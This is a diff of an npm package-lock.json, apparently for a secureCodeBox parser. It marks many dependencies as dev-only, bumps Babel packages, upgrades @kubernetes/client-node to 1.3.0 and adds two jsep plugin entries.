-116,6 +117,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", + "dev": true, "dependencies": { "@babel/compat-data": "^7.25.9", "@babel/helper-validator-option": "^7.25.9", @@ -131,6 +133,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, "dependencies": { "@babel/traverse": "^7.25.9", "@babel/types": "^7.25.9" @@ -143,6 +146,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, "dependencies": { "@babel/helper-module-imports": "^7.25.9", "@babel/helper-validator-identifier": "^7.25.9", @@ -159,22 +163,27 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "dev": true, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true, + "license": "MIT", "engines": { "node": ">=6.9.0" } @@ -183,28 +192,33 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.27.6.tgz", + "integrity": "sha512-muE8Tt8M22638HU31A3CgfSUciwz1fhATfoVai05aPXGor//CdWDCbnlY1yvBPo07njuVOCNGCSp/GTt12lIug==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" + "@babel/template": "^7.27.2", + "@babel/types": "^7.27.6" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", + "version": "7.27.5", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.27.5.tgz", + "integrity": "sha512-OsQd175SxWkGlzbny8J3K8TnnDD0N3lrIUtB92xwyRpzaenGZhxDvxN/JgU00U3CDZNj9tPuDJ5H0WS4Nt3vKg==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.26.0" + "@babel/types": "^7.27.3" }, "bin": { "parser": "bin/babel-parser.js" @@ -217,6 +231,7 @@ "version": "7.8.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -228,6 +243,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -239,6 +255,7 @@ "version": "7.12.13", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.12.13" }, @@ -250,6 +267,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -261,6 +279,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -272,6 +291,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.25.9" }, @@ -286,6 +306,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -297,6 +318,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -308,6 +330,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -319,6 +342,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -330,6 +354,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -341,6 +366,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -352,6 +378,7 @@ "version": "7.14.5", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.14.5" }, @@ -366,6 +393,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.25.9" }, @@ -377,13 +405,15 @@ } }, "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", + "version": "7.27.2", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.27.2.tgz", + "integrity": "sha512-LPDZ85aEJyYSd18/DkjNh4/y1ntkE5KwUHWTiqgRxruuZL2F1yuHligVHLvcHY2vMHXttKFpJn6LwfI7cw7ODw==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" + "@babel/code-frame": "^7.27.1", + "@babel/parser": "^7.27.2", + "@babel/types": "^7.27.1" }, "engines": { "node": ">=6.9.0" @@ -393,6 +423,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.25.9", "@babel/generator": "^7.25.9", @@ -407,12 +438,14 @@ } }, "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.27.6.tgz", + "integrity": "sha512-ETyHEk2VHHvl9b9jZP5IHPavHYk57EhanlRRuae9XCpb/j5bDCbPPMOBfCWhnl/7EDJz0jEMCi/RhccCE8r1+Q==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.27.1" }, "engines": { "node": ">=6.9.0" @@ -421,12 +454,14 @@ "node_modules/@bcoe/v8-coverage": { "version": "0.2.3", "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==" + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true }, "node_modules/@istanbuljs/load-nyc-config": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", + "dev": true, "dependencies": { "camelcase": "^5.3.1", "find-up": "^4.1.0", @@ -442,6 +477,7 @@ "version": "1.0.10", "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, "dependencies": { "sprintf-js": "~1.0.2" } @@ -450,6 +486,7 @@ "version": "3.14.1", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, "dependencies": { "argparse": "^1.0.7", "esprima": "^4.0.0" @@ -462,6 +499,7 @@ "version": "0.1.3", "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true, "engines": { "node": ">=8" } @@ -470,6 +508,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -486,6 +525,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/reporters": "^29.7.0", @@ -532,6 +572,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", + "dev": true, "dependencies": { "@jest/fake-timers": "^29.7.0", "@jest/types": "^29.6.3", @@ -546,6 +587,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", + "dev": true, "dependencies": { "expect": "^29.7.0", "jest-snapshot": "^29.7.0" @@ -558,6 +600,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", + "dev": true, "dependencies": { "jest-get-type": "^29.6.3" }, @@ -569,6 +612,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@sinonjs/fake-timers": "^10.0.2", @@ -585,6 +629,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -599,6 +644,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", + "dev": true, "dependencies": { "@bcoe/v8-coverage": "^0.2.3", "@jest/console": "^29.7.0", @@ -641,6 +687,7 @@ "version": "6.0.3", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", + "dev": true, "dependencies": { "@babel/core": "^7.23.9", "@babel/parser": "^7.23.9", @@ -656,6 +703,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -667,6 +715,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, "dependencies": { "@sinclair/typebox": "^0.27.8" }, @@ -678,6 +727,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", + "dev": true, "dependencies": { "@jridgewell/trace-mapping": "^0.3.18", "callsites": "^3.0.0", @@ -691,6 +741,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/types": "^29.6.3", @@ -705,6 +756,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", + "dev": true, "dependencies": { "@jest/test-result": "^29.7.0", "graceful-fs": "^4.2.9", @@ -719,6 +771,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@jest/types": "^29.6.3", @@ -744,6 +797,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, "dependencies": { "@jest/schemas": "^29.6.3", "@types/istanbul-lib-coverage": "^2.0.0", @@ -760,6 +814,7 @@ "version": "0.3.5", "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, "dependencies": { "@jridgewell/set-array": "^1.2.1", "@jridgewell/sourcemap-codec": "^1.4.10", @@ -773,6 +828,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true, "engines": { "node": ">=6.0.0" } @@ -781,6 +837,7 @@ "version": "1.2.1", "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true, "engines": { "node": ">=6.0.0" } @@ -788,40 +845,68 @@ "node_modules/@jridgewell/sourcemap-codec": { "version": "1.4.15", "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==" + "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", + "dev": true }, "node_modules/@jridgewell/trace-mapping": { "version": "0.3.25", "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, "dependencies": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } }, + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, + "license": "Apache-2.0", "dependencies": { "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, "node_modules/@securecodebox/parser-sdk-nodejs": { @@ -831,12 +916,14 @@ "node_modules/@sinclair/typebox": { "version": "0.27.8", "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==" + "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true }, "node_modules/@sinonjs/commons": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, "dependencies": { "type-detect": "4.0.8" } @@ -845,6 +932,7 @@ "version": "10.3.0", "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", + "dev": true, "dependencies": { "@sinonjs/commons": "^3.0.0" } @@ -853,6 +941,7 @@ "version": "7.20.5", "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, "dependencies": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", @@ -865,6 +954,7 @@ "version": "7.6.8", "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, "dependencies": { "@babel/types": "^7.0.0" } @@ -873,6 +963,7 @@ "version": "7.4.4", "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, "dependencies": { "@babel/parser": "^7.1.0", 